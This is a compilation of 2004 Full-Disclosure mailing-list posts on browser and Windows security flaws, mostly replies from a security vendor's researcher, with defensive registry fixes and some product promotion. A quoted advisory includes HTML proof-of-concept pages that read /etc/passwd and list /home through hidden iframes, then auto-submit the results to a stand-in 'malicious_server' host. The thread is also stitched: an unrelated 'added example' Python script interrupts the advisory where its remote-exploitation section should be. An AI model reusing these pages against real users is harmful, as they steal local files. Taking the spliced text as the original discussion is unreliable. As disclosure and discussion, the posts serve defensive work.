RE: [Full-Disclosure] Disclosure of local file content in Mozilla Firefox and Opera
This is not a vulnerability, it is expected behavior. Mozilla shares the same zone design as IE, which means that a file from the local file zone can read any other file from the local file zone. You cannot use this approach to read a local file from another zone such as the Internet zone. From the Internet zone, you can also only read the content of files from the same zone, same protocol and same domain.

I agree that Mozilla has implemented quite a lot of proprietary IE extensions which it should not have done; however, reading the innerHTML of an element through document.all does not circumvent the traditional zone security checks already in place.

Regards
Thor Larholm
Senior Security Researcher
PivX Solutions
23 Corporate Plaza #280
Newport Beach, CA 92660
http://www.pivx.com
[EMAIL PROTECTED]
Stock symbol: (PIVX.OB)
Phone: +1 (949) 231-8496
PGP: 0x4207AEE9
B5AB D1A4 D4FD 5731 89D6 20CD 5BDB 3D99 4207 AEE9

PivX defines a new genre in Desktop Security: Proactive Threat Mitigation.
http://www.pivx.com/qwikfix

-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] On Behalf Of Giovanni Delvecchio
Sent: Monday, December 06, 2004 3:24 PM
To: [EMAIL PROTECTED]
Subject: [Full-Disclosure] Disclosure of local file content in Mozilla Firefox and Opera

Disclosure of local file content in Mozilla Firefox and Opera

Note: I don't know if it could really be considered a security problem; anyway, I'll try to explain my ideas. Sorry for my bad English.

Author: Giovanni Delvecchio

Applications affected:
- Firefox 1.0
- Mozilla 1.7
- Opera 7.54 (*)
(maybe also previous versions)

Tested versions:
- Firefox 1.0 on Linux and Windows
- Mozilla 1.7 on Windows
- Opera 7.51 ... 7.54 on Linux

Note: The content of the following text could also apply to other browsers; I have checked just Mozilla, Firefox, Opera and Microsoft Internet Explorer. Microsoft Internet Explorer seems not to be affected.
Description:
===

A possible problem exists in some browsers where a frame can gain access to attributes of another frame or iframe. An application of this bug (?) could be the possibility to disclose the local directory structure. Moreover, there is a possibility for remote users to get the content of the target user's local files. This can be achieved by using the .innerHTML method; such a method isn't standard, but it's supported by most browsers like Opera and Mozilla Firefox.

With Opera, I have noted that it is possible to read the content of local files just if they have a *.htm or *.html extension.

PoC:
===

The following PoCs refer to Linux versions of Firefox and Opera, but they can also be applied to Windows versions.

Read a local file by the innerHTML method:

<html>
<body onLoad="ReadFileContent()">
<iframe name="local_file" src="file:///etc/passwd" height="0" width="0"></iframe>
<form name="module" method="post" action="http://malicious_server/grab.php" ENCTYPE="text/plain">
<input name="content" type="hidden" size="300">
</form>
<script>
function ReadFileContent(){
  alert(local_file.document.all(0).innerHTML);
  document.module.content.value+=local_file.document.all(0).innerHTML;
  //send content to malicious_server
  document.module.submit();
}
</script>
</body>
</html>

(*) It works with Firefox; with Opera it works just if the file has a .htm or .html extension.
---

Enum /home directory structure:

<html>
<body onLoad="
for(i=0;i<local_files.document.links.length;i++)
  {document.module.content.value+=local_files.document.links.item(i);}
alert(document.module.content.value);
//send list_files at malicious_server
document.module.submit();
">
<form name="module" method="post" action="http://malicious_server/grab.php" ENCTYPE="text/plain">
<input name="content" type="hidden" size="300">
</form>
<iframe name="local_files" src="file:///home/" height="0" width="0"></iframe>
</body>
</html>

---

Impact:
==

A malicious server could:
- obtain the content of the /home/ directory (or C:\Documents and Settings\ for Windows systems) and so know a set of usernames present on the target system.
- know if a particular program is installed on the target system for a successive attack.
- read confidential file content.
- read the browser's cache. In Opera it is located in ~/.opera/cache4, while in Mozilla Firefox it's in ~/.mozilla/firefox/$RANDOM-STRING.default/Cache. Since it is possible to enumerate the directory structure, a malicious user could easily know the path to Firefox's cache.

Anyway, it cannot be exploited directly by a remote site, but only if the page is opened from a local path (file://localpath/code.htm), since the iframe belongs to a local domain.

Note: with Internet Explorer these PoCs don't work even locally.

Possible method of remote exploitation
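The reply at the top of this thread states the rule that decides the whole question: a frame may read another frame only from the same zone, the same protocol and the same domain, and file: URLs all sit in the local zone. The following is an added example (not code from either post) that models that rule in Python so the two cases in the thread can be checked side by side: the PoC opened from a local path (allowed, same local zone) and the same page served by a remote host (denied, different zone). The zone names and the classification of URLs into zones are a simplified assumption modelled on IE's security zones, not the real zone-mapping logic of IE or Mozilla; the `locked_zones` parameter models the mitigation of disabling scripting in the local zone altogether.

```python
from urllib.parse import urlsplit

# Zone names follow IE's security zones; the classification below is a
# simplified assumption, not the real zone-mapping logic of IE or Mozilla.
LOCAL_MACHINE = "Local Machine"
LOCAL_INTRANET = "Local intranet"
INTERNET = "Internet"


def zone_of(url: str) -> str:
    """Assign a URL to a security zone (simplified: file: is Local
    Machine, a dotless host is Local intranet, anything else Internet)."""
    parts = urlsplit(url)
    if parts.scheme == "file":
        return LOCAL_MACHINE
    host = parts.hostname or ""
    return LOCAL_INTRANET if host and "." not in host else INTERNET


def origin_of(url: str) -> tuple:
    """The triple that must match for cross-frame access: zone, protocol,
    domain. All file: URLs share one empty domain, which is exactly why a
    local page may read any other local file."""
    parts = urlsplit(url)
    return (zone_of(url), parts.scheme.lower(), (parts.hostname or "").lower())


def may_read(reader_url: str, target_url: str, locked_zones=()) -> bool:
    """Decide whether a page at reader_url may read a frame at target_url.

    locked_zones names zones in which active scripting is disabled
    outright: a reader in such a zone cannot script anything at all, so
    even the local-to-local case is denied.
    """
    reader = origin_of(reader_url)
    if reader[0] in locked_zones:
        return False
    return reader == origin_of(target_url)


def explain(reader_url: str, target_url: str, locked_zones=()) -> str:
    """Human-readable verdict used by the demo below."""
    verdict = "allowed" if may_read(reader_url, target_url, locked_zones) else "denied"
    return f"{reader_url} -> {target_url}: {verdict} ({origin_of(reader_url)[0]} zone)"


if __name__ == "__main__":
    # Constructed cases mirroring the thread: the PoC opened from a local
    # path, the same PoC served remotely, a protocol mismatch, and the
    # local zone with scripting locked down.
    print(explain("file:///home/user/code.htm", "file:///etc/passwd"))
    print(explain("http://malicious_server/code.htm", "file:///etc/passwd"))
    print(explain("http://www.example.com/a.htm", "https://www.example.com/b.htm"))
    print(explain("file:///home/user/code.htm", "file:///etc/passwd",
                  locked_zones=(LOCAL_MACHINE,)))
```

Run it as a script to see the four verdicts; the only "allowed" line is the local-to-local one, which is the behaviour the reply calls expected, and it flips to "denied" once the local zone is in `locked_zones`.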
[Full-Disclosure] RE: How to Break Windows XP SP2 + Internet Explorer 6 SP2
I successfully reproduced this exploit on a fully patched XPSP2 installation and can verify that malware.htm is planted locally, after which HTML Help is used to launch it and circumvent the XPSP2 browser security improvements, compromising the system.

However, this exploit did not work on any systems with Qwik-Fix Pro installed, from Windows 95 to Windows XP Service Pack 2. A free Home edition and a trial Corporate edition are available for download at http://www.pivx.com/qwikfixDownload.asp

Before you can successfully use any Drag'n'Drop technique or script shortcuts to plant a file on the local system, you first need to be able to reference local content. If you cannot reference local contents or directories from the Internet zone, then you cannot retrieve the window handle that is necessary for any Drag'n'Drop exploits or any cross-domain scripting exploits.

IE6SP1 initially blocked all direct references to the FILE:// and RES:// protocols, which I demonstrated how to circumvent through the OBJECT element. This was quickly patched in the next cumulative security update and thereby blocked the traditional cross-domain scripting exploits. XPSP2 went further and tightened down the Local Machine Zone with the recommendations PivX Labs made public in late 2003, so that even if you could find a way to reference local content and subsequently inject scripting through a cross-domain vulnerability, you would not be able to accomplish anything. This LMZ lockdown has a per-process exception list in which HTML Help is included.

When the LMZ is locked down, attackers have to find alternative attack vectors, of which the Drag'n'Drop vulnerability is a prime example. When IE renders an IMG element it gives priority to the SRC attribute, but when IE drops an IMG element on an arbitrary window it gives priority to the DYNSRC attribute.
If you are able to reference any local content, you can therefore drop the DYNSRC attribute of the IMG element on the window with local content and thereby plant a file on the file system in a known location. The browser security improvements in XPSP2 do not include further restrictions on referencing local content, which is why the Drag'n'Drop exploits to this date affect fully patched XPSP2 systems.

Qwik-Fix Pro restricts local content referencing through a number of means, of which one is responsible for protecting against this exploit: in order for http-equiv's exploit to work, the ceegar.html file uses the AnchorClick behavior to open C:\WINDOWS\PCHealth\ in a named window, which is then used as a drop target for the DYNSRC pointing to the malwarez file. When any behavior in IE tries to list a local directory it uses the Shell.Explorer ActiveX object, an object which has no justification of use inside the browser but which is heavily used by Windows Explorer itself.

Setting the Kill Bit on the Shell.Explorer ActiveX object prevents IE from referencing local directories in a window object, whether it's through the AnchorClick behavior or some other approach that we discover tomorrow. The GUID for Shell.Explorer is {8856F961-340A-11D0-A96B-00C04FD705A2} and Knowledge Base article 240797 (http://support.microsoft.com/?kbid=240797) explains how the process works.
PivX Labs released a freely available registry fix that sets the Kill Bit on Shell.Explorer almost 2 months ago, which can be downloaded from http://www.pivx.com/research/freefixes/neutershellexplorer.reg

For clarity, here are the file contents:

=== neutershellexplorer.reg ===
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{8856F961-340A-11D0-A96B-00C04FD705A2}]
"Compatibility Flags"=dword:00000400
=== neutershellexplorer.reg ===

PivX Labs has covered this topic several times before on the Unpatched mailing list, which receives advance notification of our security research, including several Win95-XPSP2 vulnerabilities that will be released in the interim future. For more information or to subscribe you can visit http://unpatched.pivxlabs.com

Regards
Thor Larholm
Senior Security Researcher
PivX Solutions

-----Original Message-----
From: Windows NTBugtraq Mailing List [mailto:[EMAIL PROTECTED]] On Behalf Of [EMAIL PROTECTED]
Sent: Wednesday, October 20, 2004 5:36 AM
To: [EMAIL PROTECTED]
Subject: How to Break Windows XP SP2 + Internet Explorer 6 SP2

Snip
http://www.ntbugtraq.com/default.asp?pid=36sid=1A2=ind0410L=ntbugtraqF=PS=P=10781
Snip
http://tinyurl.com/4xeww

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] RE: How to Break Windows XP SP2 + Internet Explorer 6 SP2
> From: Maarten [mailto:[EMAIL PROTECTED]]
>> http://www.pivx.com/qwikfixDownload.asp
> No it is not, at least not before you fix your broken download form. Hitting submit does nothing at all. (You're not seriously telling us that you need MSIE to download qwikfix, or do you ?!)

I just filled out the form and submitted without problems in IE, Mozilla, Firefox and Opera. Judging from your user-agent you are using KDE, which most likely has problems with ' being used both for the HTML attribute and JS strings inside the onsubmit event handler. What version of KHTML are you using?

I've asked our webmaster to correct this immediately and I apologize for the bad impression this must have given you. In the meantime, please use the direct Home edition download page at http://www.pivx.com/qwikfixDownloadPage.asp

> a disappointed potential customer

Again, my apologies.

Regards
Thor Larholm
[Full-Disclosure] RE: AOL Instant Messenger Away Message Buffer Overflow Vulnerability
Deleting the HKEY_CLASSES_ROOT\aim registry key is not a permanent mitigation but a per-session change that has to be implemented every time AOL Instant Messenger is instantiated. The reason for this is that if the HKCR\aim key is missing when AIM is launched, AIM will simply recreate the key and thus the URL protocol.

If you want to mitigate against any use of the AIM protocol, the most viable approach is to implement a URL protocol handler to either filter or disregard the data. You can read more about asynchronous pluggable protocols in IE at http://msdn.microsoft.com/workshop/networking/pluggable/overview/overview.asp

If you want to simply disregard any data sent to the aim: URL protocol, you can implement the about: URL protocol handler, which is located at HKEY_CLASSES_ROOT\PROTOCOLS\Handler\about\CLSID. This REG_SZ value contains the data {3050F406-98B5-11CF-BB82-00AA00BDCE0B}, which points at MSHTML.DLL and ensures that any data sent through the protocol will not be parsed by its intended application. AIM doesn't have a URL protocol handler of its own, so you will have to create the keys yourself. This would be equivalent to the following .reg file:

=== neuteraimurl.reg ===
Windows Registry Editor Version 5.00

[HKEY_CLASSES_ROOT\PROTOCOLS\Handler\about]
"CLSID"="{3050F406-98B5-11CF-BB82-00AA00BDCE0B}"
=== neuteraimurl.reg ===

If you implement this registry change, the aim URL protocol handler will be neutered.

There are a lot of potentially dangerous URL protocols on any Windows system (e.g., take a look at callto: or ldap:). You can locate all the URL protocols on your system by searching through your registry for a REG_SZ value called "URL Protocol", which is located under HKCR\*\URL Protocol. As an example, you can neuter the Shell protocol in a similar manner. End-node security solutions can help mitigate the risk of URL protocols by filtering data and implementing the lacking input validation.
Qwik-Fix Pro is currently having several fixes developed that protect against exploitation of not only the aim URL protocol but other potentially malicious URL protocols as well. You can download a copy of Qwik-Fix Pro at http://www.pivx.com/qwikfix/

Regards
Thor Larholm
Senior Security Researcher
PivX Solutions

-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, August 10, 2004 1:12 PM
To: [EMAIL PROTECTED]
Subject: AOL Instant Messenger Away Message Buffer Overflow Vulnerability

THIS WAS NOT DISCOVERED BY ME.

Source: Secunia (http://secunia.com/advisories/12198/)

Description:
Ryan McGeehan has reported a vulnerability in AOL Instant Messenger (AIM), which can be exploited by malicious people to compromise a user's system.

The vulnerability is caused due to a boundary error within the handling of Away messages and can be exploited to cause a stack-based buffer overflow by supplying an overly long Away message (about 1024 bytes). A malicious website can exploit this via the aim: URI handler by passing an overly long argument to the goaway?message parameter.

Successful exploitation allows execution of arbitrary code on a user's system when e.g. a malicious website is visited with certain browsers.

The vulnerability has been confirmed in version 5.5.3595. Other versions may also be affected.

NOTE: Various other issues were also reported, where a large amount of resources can be consumed on a user's system.

Solution:
The vendor has contacted Secunia and recommends that users install a beta version, which addresses the vulnerability, or remove support for the aim: URI handler by deleting the HKEY_CLASSES_ROOT\aim registry key.
A new non-beta version is forthcoming.

Provided and/or discovered by:
The vulnerability was discovered independently by the following around the same time:
1) Ryan McGeehan and Kevin Benes, TheBillyGoatCurse.com.
2) Matt Murphy
[Full-Disclosure] RE: AOL Instant Messenger Away Message Buffer Overflow Vulnerability
As several of you have pointed out, the neuteraimurl.reg file should of course have said aim instead of about, as in

=== neuteraimurl.reg ===
Windows Registry Editor Version 5.00

[HKEY_CLASSES_ROOT\PROTOCOLS\Handler\aim]
"CLSID"="{3050F406-98B5-11CF-BB82-00AA00BDCE0B}"
=== neuteraimurl.reg ===

You can find a copy of this file at http://www.pivx.com/research/freefixes/neuteraimurl.reg

Feel free to implement this registry fix as you see fit.

Regards
Thor Larholm
Senior Security Researcher
PivX Solutions

-----Original Message-----
From: Thor Larholm
Sent: Wednesday, August 11, 2004 10:25 AM
To: '[EMAIL PROTECTED]'; '[EMAIL PROTECTED]'
Subject: RE: AOL Instant Messenger Away Message Buffer Overflow Vulnerability

Deleting the HKEY_CLASSES_ROOT\aim registry key is not a permanent mitigation but a per-session change that has to be implemented every time AOL Instant Messenger is instantiated. The reason for this is that if the HKCR\aim key is missing when AIM is launched, AIM will simply recreate the key and thus the URL protocol. If you want to mitigate against any use of the AIM protocol, the most viable approach is to implement a URL protocol handler to either filter or disregard the data.
RE: [Full-Disclosure] mi2g - fud, lies and libel
> From: Eric Paynter
> On Tue, July 20, 2004 4:17 pm, [EMAIL PROTECTED] said:
>> This is a blatant lie from Matai and mi2g, nothing more.
> Or maybe it's also a hoax?

http://www.mi2g.com/cgi/mi2g/press/200704.php
[Full-Disclosure] RE: RE: HijackClick 3
-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]

The codeBase attribute has allowed command execution from the My Computer zone without interruption since this misfeature was discovered by Dildog. It was not automatically re-enabled with yesterday's patches, so there must have been some other problem with your systems that has made it untestable for you during the years. If you need an easily reproducible PoC for codeBase you can use the example from GM#001-IE [1]. Put a fresh Windows XP image on VMWare or VirtualPC, apply all the patches up to June/July 2003 and you will see that the PoC still works. You can even combine codeBase with any of the recent click hijacking vulnerabilities from Paul and you can see that beneath the new Information Bar in SP2 the same codeBase functionality is present (by the way, that bar is not present in the Intranet or Trusted Sites zones).

[1] http://www.greymagic.com/security/advisories/gm001-ie/

We have by no means been trying to hide the download location of Qwik-Fix Pro from anyone. We are in the middle of a data center move and have been readily handing out internal download locations and instructions, delivering guidance and support to anyone who has inquired. However, I cannot locate a download request from you in our support center. Qwik-Fix Pro is currently in Release Candidate 1 with a planned General Availability for August. We most certainly appreciate the tremendous beta feedback we have received over these last months; it has helped us tremendously.

It is not apparent from your post whether you have been testing the long ago discontinued Qwik-Fix Beta v0.60 or the later Qwik-Fix Pro, but the description of your problems sounds as if no changes are even applied to your system. If you could give us more details about your system (OS, SP level) I would love to reproduce this.
You are not mentioning any of the URL protocol handler lockdowns, MIME type mitigations or icon handler restrictions that RC1 contains, so I am guesstimating that you have been testing an older beta version. Feel very welcome to request an RC1 download from our site. I am also positive that your concerns about the updating logic will be answered fully once you look at the multiple layers of encryption and digital signatures based on 2048-bit RSA keys that combined mitigate against the impact of any imaginable MITM attack. These are all covered in the complete forensics analysis of Qwik-Fix Pro that will be released in the near future. We are trying to far exceed the industry expectations on the level of openness and are eagerly playing cards with our hands open.

It is encouraging that you have enough faith in Windows XP Service Pack 2 to hint that it will solve all the security issues in Internet Explorer. I will have to disagree with that sentiment, as vulnerabilities have been discovered that even work on a fully patched XPSP2RC2. Much as you, I am looking forward to the improvements of the final service pack.

Regards
Thor Larholm
Senior Security Researcher
PivX Solutions
[Full-Disclosure] RE: MSIE Similar Method Name Redirection Cross Site/Zone Scripting Vulnerability
Nice find :)

The problem does not rely on similarly named methods; rather, it relies on the trust access checks that IE performs on function calls in disparate windows. When you try to alert each of the assign methods in your example, their core toString methods are called, which return a static string; however, this is not used for comparison, as each assign method still has its own unique internal ID. Instead, IE tries to determine whether the function call is safe based on the level of trust it has to the object that the method resides on.

Your approach enables a range of method caching vulnerabilities by circumventing the object security check. This can be demonstrated by creating a cached reference to the location.assign method from the first window on the second window's location object, not just on the location.assign method but also on the location.replace method and the non-existent location.whatever property. I have added such a demo at http://www.pivx.com/research/2004/7/PaulsimilarMethodNameRedirection/test2.html

Regards
Thor Larholm
Senior Security Researcher
PivX Solutions

-----Original Message-----
From: Paul [mailto:[EMAIL PROTECTED]]
Sent: Sunday, July 11, 2004 8:34 AM
To: [EMAIL PROTECTED]
Subject: MSIE Similar Method Name Redirection Cross Site/Zone Scripting Vulnerability

Note: This vulnerability and many more can be found at http://www.greyhats.cjb.net

SimilarMethodNameRedir
Automatic Remote Compromise

[Tested]
IEXPLORE.EXE file version 6.0.2800.1106
MSHTML.DLL file version 6.00.2800.1400
Microsoft Windows XP sp2

[Discussion]
At first I thought this vulnerability had something to do with method caching. It doesn't.
It has to do with the security check that Internet Explorer has in place. Apparently, if a function is redirected to a function with the same name, it can be called without security restrictions. If you want to see what I mean, try this:

<script>
var var1=location.assign;
alert("Assign function of the current window:\n"+var1);
var w=window.open("about:blank","_blank");
var var2=w.location.assign;
alert("Assign function of the new window:\n"+var2);
w.close();
</script>

You should get two alerts describing the assign() function as being

function assign(){ [Native code] }

Notice both functions appear to be the same. My guess is that Internet Explorer checks the two function names and (maybe) the function code. If it matches, Internet Explorer marks the function as safe. It doesn't, however, take into account cross-window function calls. That's why SimilarMethodNameRedir works.

How bad is this problem? Critical. With minimal effort, a malicious website owner could install viruses or spyware on the visitor's computer. Because theoretically this should work with every function, the only way that I can think of to fix the problem is to rewrite the whole function security check that Internet Explorer has in place. The best way to prevent this vulnerability is to either disable active scripting or switch to a different browser ;).

The example goes to google.com and executes javascript that displays a messagebox with the location.href and the document.cookie attributes of the window object.

[Example]
http://freehost07.websamba.com/greyhats/similarmethodnameredir.htm
[Full-Disclosure] RE: Unchecked buffer in mstask.dll
In MS02-022 the only workaround Microsoft lists is this: "Do not open or save .job files that you receive from untrusted sources."

As you mentioned, this vulnerability can be triggered automatically without user interaction and without opening or saving .job files, by navigating to an Explorer folder that contains a malicious .job file, which can be done either locally, remotely on a webpage or inside an HTML email. The primary cause of this automated exploitation is the concept of dynamic icon handlers. For an introduction to these, read the "Creating Icon Handlers" article at http://msdn.microsoft.com/library/en-us/shellcc/platform/shell/programmersguide/shell_int/shell_int_extending/extensionhandlers/iconhandlers.asp (short: http://tinyurl.com/3uanu )

To quote:

> An icon handler is a type of Shell extension handler that allows you to dynamically assign icons to the members of a file class. Every time a file from the class is displayed, the Shell queries the handler for the appropriate icon. For instance, an icon handler can assign different icons to different members of the class, or vary the icon based on the current state of the file.

To summarize, every time you open a directory in an Explorer window, Explorer will examine each and every filetype in that directory and determine whether each filetype has an associated icon handler. When you look at .job files you get a reference to the JobObject entry in HKLM\Software\Classes\JobObject, which in turn has a shellex\IconHandler entry that points at {DD2110F0-9EEF-11cf-8D8E-00AA0060F5BF}, whose InProcServer32 is mstask.dll, which is automatically launched without user interaction.

You can completely mitigate against automated exploitation of this vulnerability simply by deleting or renaming the following registry entry:

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\JobObject\shellex\IconHandler

The only noticeable difference is that your .job files will not have as pretty an icon.
I'm positive that following your advisory we will find other vulnerabilities involving dynamic icon handlers. It's quite easy to mitigate against this potential impact simply by removing all dynamic icon handlers, and I'll be testing the cosmetic impact of this in the days to come. Removing the automated attack vector means that the only way to have this exploited is to convince the user to launch Task Scheduler and import your malicious .job file. As Brett mentions, Qwik-Fix Pro protects against automated remote exploitation of this vulnerability and you can get a free copy at http://qwik-fix.net/.

Microsoft should update the MS02-022 bulletin to reflect that automated exploitation is possible. Currently, the only listed affected software is Windows 2000, but I had no problems reproducing this on Windows XP as well. Since there is no patch available for Windows XP to fix this vulnerability, the only workaround is to disable the dynamic icon handler for JobObject files, as described above.

Regards
Thor Larholm
Senior Security Researcher
PivX Solutions

-----Original Message-----
From: Brett Moore [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, July 13, 2004 10:51 PM
To: [EMAIL PROTECTED] Com
Subject: Unchecked buffer in mstask.dll

= Unchecked buffer in mstask.dll
=
= MS Bulletin posted:
= http://www.microsoft.com/technet/security/bulletin/MS04-022.mspx
=
= Affected Software:
= Microsoft Windows 2000 Service Pack 4
= Microsoft Windows XP, Microsoft Windows XP Service Pack 1
=
= Public disclosure on July 14, 2004

When thinking about buffer overflow vulnerabilities, a file can sometimes be as harmful as a packet.
Even though past security issues have taught us that it is unwise to use an unvalidated text string containing a file name or directory, that is what happened here. By creating a .job file with a large "to be executed" field, the stack can be overwritten, allowing for remote command execution when the file is parsed by mstask.dll.

== Description ==

It appears that both explorer.exe and iexplore.exe will parse a .job file when showing folder listings. Upon the parsing of the .job file, the large "to be executed" field is passed to wcscpy without doing any bounds checking.

Using Explorer, the viewing of a folder containing the .job is enough to cause the buffer overflow to occur. The file can be hosted locally or on a remote network share. A remote attack would require the end user to visit the folder/share containing the exploit file.

Using Internet Explorer the viewing of a folder containing the .job file through
[Full-Disclosure] RE: Registry Fix For Variant of Scob
Setting the kill bit on the Shell.Application ActiveX object, or any other ActiveX, is a system wide configuration change. This is also the reason for the incompatibility issues you are mentioning, but there is no reason to kill the bird to secure the nest. The problem here is not the ADODB.Stream or Shell.Application objects, the problem is the insecure My Computer zone in Internet Explorer.

Your registry fix will have adverse functionality regressions on any Windows administrator that uses WSH when there is no reason for this. ActiveX objects are used in many hosts of which IE is just one; others include JScript, VBScript, HTML Applications and WSH, all of which run outside of the browser and require executional privileges to launch in the first place.

The prerequisite for even having privileges enough to launch the Shell.Application ActiveX object inside IE is to have script running in the My Computer zone. Locking down this zone will completely prevent this exploit, without introducing functionality regressions in other parts of Windows. In fact, if you had implemented the registry changes I described back in early September 2003 you would have been safe against all the command execution vulnerabilities that have subsequently been discovered - including ADODB.Stream and Shell.Application, which are themselves just minor components of a larger exploit prerequisite.

http://www.securityfocus.com/archive/1/346174/2003-11-30/2003-12-06/0

I am sure that tomorrow, next week and next month we will find even more ways to exploit insecure zone privileges in IE. You can either try to fix the root cause once or you can try to treat each new symptom as it is discovered. There is no need to hurriedly introduce last-minute system wide functionality regressions such as killbitting Shell.Application, all you need to do is lock down the My Computer zone in IE properly.

We implemented this in Qwik-Fix last September and have since then not had to worry about exploits that target these design principles in IE. Instead, we have been able to focus our efforts on securing other parts of Windows as opposed to scrambling to cope with each new exploit from jelmer or http-equiv. You can get a free copy of Qwik-Fix Pro at http://qwik-fix.net

All software is inherently insecure, the difference is in how you treat that insecurity.

Regards

Thor Larholm
Senior Security Researcher
PivX Solutions
24 Corporate Plaza #180
Newport Beach, CA 92660
http://www.pivx.com
[EMAIL PROTECTED]
Stock symbol: (PIVX)
Phone: +1 (949) 231-8496
PGP: 0x5A276569 6BB1 B77F CB62 0D3D 5A82 C65D E1A4 157C 5A27 6569

PivX defines a new genre in Desktop Security: Proactive Threat Mitigation.
http://www.pivx.com/qwikfix

-----Original Message-----
From: Drew Copley [mailto:[EMAIL PROTECTED]]
Sent: Friday, July 02, 2004 2:33 PM
To: Windows NTBugtraq Mailing List; [EMAIL PROTECTED]
Subject: Registry Fix For Variant of Scob

About the same time Jelmer found the adodb bug, http-equiv found a similar issue with the object Shell.Application. This issue has also been unfixed for the past ten months. Unfortunately, Microsoft has not taken the hint and not fixed this issue either.

Jelmer has noted this and made a proof of concept exploit page here:
http://62.131.86.111/security/idiots/malware2k/installer.htm

The below registry file will protect you from this exploit by killbitting the Shell.Application variant.

---
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{13709620-C279-11CE-A49E-44455354}]
"Compatibility Flags"=dword:0400

I will be updating our free fix download here:
http://www.eeye.com/html/research/alerts/AL20040610.html

This will break some hta scripts that might be used for management. It may cause some incompatibility issues with some programs. Shell.Application is commonly used by administrators for administration of systems via Visual Basic script or WSH. It may have other uses. It is kind of Microsoft's answer to shell script -- though not as happy as batch.

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: RE: SUPER SPOOF DELUXE Re: [Full-Disclosure] Microsoft and Security
Both you and I know perfectly well that Windows Update serves a different page for non-IE browsers, and that that page does not contain any frames. You should focus on the facts instead of letting your hatred for Microsoft overwhelm you.

Since you have trouble reproducing a very simple example I have instead put this example online:

http://www.jscript.dk/2004/7/subframe/

Open the page. Click the first button called "Open window". Click the second button called "Load page". See that the page from geocities.com is now loaded inside the subframe on jscript.dk.

As you can see, this is perfectly reproducible in both IE, Mozilla, Firefox and Opera. This is of course provided that they allow popups in the first place, but as I mentioned in my previous posts you can accomplish the same with inline frames instead of a new browser window.

To make doubly sure, I even downloaded fresh copies of Firefox 0.9.1 (worked fine in 'Safe Mode' as well) and Opera 7.51.

Regards

Thor Larholm
Senior Security Researcher
PivX Solutions
23 Corporate Plaza #280
Newport Beach, CA 92660
http://www.pivx.com
[EMAIL PROTECTED]
Stock symbol: (PIVX.OB)
Phone: +1 (949) 231-8496
PGP: 0x5A276569 6BB1 B77F CB62 0D3D 5A82 C65D E1A4 157C 5A27 6569

PivX defines a new genre in Desktop Security: Proactive Threat Mitigation.
http://www.pivx.com/qwikfix

-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]
Sent: Thursday, July 01, 2004 1:09 PM
To: Thor Larholm; [EMAIL PROTECTED]; [EMAIL PROTECTED]
Cc: [EMAIL PROTECTED]
Subject: RE: SUPER SPOOF DELUXE Re: [Full-Disclosure] Microsoft and Security

Yes of course. Two tiny problems though:

1. Your little scriptlet doesn't work for me. I get:

'W.frames.2.location' is null or not an object

2. If as you claim this is standard practice then there is something wrong with these browsers as it apparently does not work on them:

The following browsers are not affected:
* Mozilla Firefox 0.9 for Windows
* Mozilla Firefox 0.9.1 for Windows
* Mozilla 1.7 for Windows
* Mozilla 1.7 for Linux

http://secunia.com/advisories/11978/

Perhaps someone who really knows will enlighten us all.
RE: SUPER SPOOF DELUXE Re: [Full-Disclosure] Microsoft and Security
> From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]

Your subject makes it sound like this is a spoofing vulnerability when in fact this is expected functionality that has been around since Netscape 2 and IE3 which does not grant additional privileges of any kind and requires the user to activate WindowsUpdate from your site.

> Here's a quick and dirty demo injecting malware.com into windowsupdate.microsoft.com :)
> http://www.malware.com/targutted.html

Your script opens a new window and then uses a timer to change the location of whatever window object has focus. This does not switch security zone or even protocol, all it does is to load your site into a subframe of another site. You can accomplish the exact same without trying to 'trick' anything by using the following 2 lines:

W=window.open("http://v4.windowsupdate.microsoft.com");
W.frames[2].location.href = "http://pivx.com/";

This is no different than loading WindowsUpdate in a frame on your own site. It has always been standard practice that you can change, but not read, the location of any window object to a site from the same protocol and security zone. A frame is a window object and all window objects are safely exposed because they by themselves do not reveal any information about the site inside the frame. You can get a handle of any window object to any depth because the frames collection is also safely exposed. This does not give you any kind of access to the document object inside, which would be necessary for any kind of code injection or cookie theft.

Regards

Thor Larholm
Senior Security Researcher
PivX Solutions
23 Corporate Plaza #280
Newport Beach, CA 92660
http://www.pivx.com
[EMAIL PROTECTED]
Stock symbol: (PIVX.OB)
Phone: +1 (949) 231-8496
PGP: 0x5A276569 6BB1 B77F CB62 0D3D 5A82 C65D E1A4 157C 5A27 6569

PivX defines a new genre in Desktop Security: Proactive Threat Mitigation.
http://www.pivx.com/qwikfix

-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, June 29, 2004 11:41 AM
To: [EMAIL PROTECTED]
Cc: [EMAIL PROTECTED]
Subject: SUPER SPOOF DELUXE Re: [Full-Disclosure] Microsoft and Security

Thomas Kessler was kind enough to inform that this is not new, but in fact an old issue with Internet Explorer which by all accounts was supposed to be patched back in 1998[?]:

Microsoft Security Program: Microsoft Security Bulletin (MS98-020)
Patch Available for 'Frame Spoof' Vulnerability
http://www.microsoft.com/technet/security/bulletin/ms98-020.mspx

Quite clearly this contraption known as Internet Explorer is just broken. It's oozing pus from every pore at this stage. If indeed the issues are the exact same. You'd better wipe hands of it anyway. We give up.

--
http://www.malware.com
RE: SUPER SPOOF DELUXE Re: [Full-Disclosure] Microsoft and Security
> From: Pavel Kankovsky [mailto:[EMAIL PROTECTED]]
>
> If a script from site A can replace the contents of a frame within a document from site B then site A is able to violate the *integrity* of B's contents. This is unacceptable.

